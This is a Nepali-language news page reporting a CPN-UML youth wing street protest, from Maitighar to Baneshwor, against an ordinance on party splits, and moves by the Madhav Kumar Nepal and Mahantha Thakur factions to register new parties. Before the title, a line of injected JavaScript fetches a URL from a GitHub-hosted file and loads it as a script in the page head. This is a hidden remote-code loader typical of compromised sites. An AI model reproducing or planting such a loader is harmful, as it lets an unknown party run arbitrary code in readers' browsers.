;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दल विभाजनसम्बन्धी अध्यादेशको विरोधमा नेकपा एमालेले सडक प्रदर्शन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दल विभाजनसम्बन्धी अध्यादेशको विरोधमा नेकपा एमालेले सडक प्रदर्शन
Breaking News

दल विभाजनसम्बन्धी अध्यादेशको विरोधमा नेकपा एमालेले सडक प्रदर्शन

जुनेली न्यूज, काठमाण्डौ | दल विभाजनसम्बन्धी अध्यादेशको विरोधमा नेकपा एमालेले सडक प्रदर्शन गरेको छ । एमालेको युवा संगठन युवा संघ नेपालले काठमाडौंको माइतीघरदेखि बानेश्वरसम्म प्रदर्शन गरेको हो ।

मुलुकलाई अस्थिरतातर्फ धकेल्न जनघाती निर्णय गरेको भन्दै युवा संघले प्रदर्शन गरेको हो ।बुधबार दलविभाजनसम्बन्धी अध्यादेश राष्ट्रपतिले प्रमाणीकरण गरेको छ | तर सत्ता पक्ष र प्रतिपक्षका धेरै नेताहरुले यसको बिरोध गरेका छन |

उता नेकपा एमालेको माधवकुमार नेपाल समूह नयाँ दल दर्ता गर्न निर्वाचन आयोग पुगेको छ । त्यस्तै जनता समाजवादी पार्टीको महन्थ ठाकुर पक्ष पनि नयाँ दल दर्ताका लागि आयोग गएको छ ।

फेसबुक प्रतिक्रियाहरु